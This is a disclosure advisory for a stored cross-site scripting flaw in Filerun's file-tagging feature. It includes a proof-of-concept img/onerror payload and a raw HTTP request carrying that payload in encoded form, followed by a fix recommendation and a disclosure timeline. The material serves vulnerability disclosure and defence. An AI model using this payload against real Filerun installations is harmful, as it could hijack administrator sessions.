Details

Advisory ID: usd-2022-0029
Product: Filerun Affected Version: 20220519
Vulnerability Type: CWE-79
Security Risk: Critical
Vendor URL: https://filerun.com
Advisory Status: Open
CVE number: Not requested yet
CVE Link: Not requested yet

Introduction

Filerun allows users to assign tags to files, which results in stored XSS if a user (e.g. the superuser) visits the page. The payload is also triggered if a user wants to remove the tag from the file. If the user is allowed to share files with other internal users, the payload can be used to target the superuser directly and perform arbitrary actions in the session of the superuser.

Proof of Concept

Assigning a tag with a payload like <img onerror="alert(document.domain)" src="/X"/> triggers a stored XSS.

POST /?module=metadata&section=tags&page=add HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
[...]
Cookie: XSStags%5B%5D=%22%3E%3Cimg%20src%3D%2FX%20onerror%3Dalert(document.domain)%3E&paths%5B%5D=%2FROOT%2FHOME%2Fjdoe%2Fxss.png&csrf=d722a379c57c50d086dfef0dfce9dc0f55908d1353b271d362554a07c703a152

Fix

It is recommended to treat all input on the website as potentially dangerous.
Hence, all output that is dynamically generated based on user-controlled data should be encoded according to its context.
The majority of programming languages support standard procedures for encoding meta characters.

References

• https://owasp.org/www-community/attacks/xss/

Timeline

2022-07-15: First contact request via mail
2022-07-15: Shared vulnerability details with vendor
2023-12-21: Publish advisory

Credits

This security vulnerability was found by Christian Pöschl of usd AG.